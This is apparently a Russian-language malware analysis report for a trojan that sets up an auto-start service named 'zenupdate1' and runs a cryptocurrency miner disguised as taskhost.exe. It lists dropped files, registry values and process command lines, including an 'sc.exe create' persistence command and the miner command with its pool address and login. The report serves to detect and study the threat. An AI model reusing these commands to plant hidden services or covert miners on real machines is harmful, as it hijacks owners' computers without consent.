Техническая информация
Создаёт службу zenupdate1 с автоматическим запуском (Start = 2):
- [<HKLM>\SYSTEM\ControlSet001\Services\zenupdate1] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\zenupdate1] 'ImagePath' = '%WINDIR%\Windows\1.exe'
- %TEMP%\RarSFX0\CP.exe
- %TEMP%\RarSFX1\CP1.exe
- %TEMP%\RarSFX1\CP2.exe
- %WINDIR%\Windows\run.bat
- %WINDIR%\Windows\1.exe
- %WINDIR%\Windows\taskhost.exe
- %WINDIR%\Windows\1.vbs
- %TEMP%\RarSFX2\1.bat
- %TEMP%\RarSFX2\3.bat
- %TEMP%\RarSFX2\2.lnk
- %TEMP%\RarSFX2\1.bat
- %TEMP%\RarSFX2\2.lnk
- %TEMP%\RarSFX2\3.bat
- ClassName: 'EDIT' WindowName: ''
Командные строки запускаемых процессов:
- '%TEMP%\RarSFX0\CP.exe' -p8192
- '%TEMP%\RarSFX1\CP1.exe'
- '%WINDIR%\Windows\1.exe'
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Windows\1.vbs"
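- '%WINDIR%\Windows\taskhost.exe' -o stratum+tcp://fcn-xmr.pool.minergate.com:45590 -u fizerator@yandex.ru -p x -k --donate-level=1
  (параметры командной строки характерны для майнера криптовалюты: подключение к пулу по протоколу stratum+tcp; файл назван taskhost.exe, но расположен в %WINDIR%\Windows\, тогда как системный taskhost.exe находится в <SYSTEM32>)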
- '%TEMP%\RarSFX1\CP2.exe'
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Windows\run.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX2\3.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX2\1.bat" "
- '<SYSTEM32>\sc.exe' create zenupdate1 binPath= %WINDIR%\Windows\1.exe DisplayName= Zenupdate1 type= own start= auto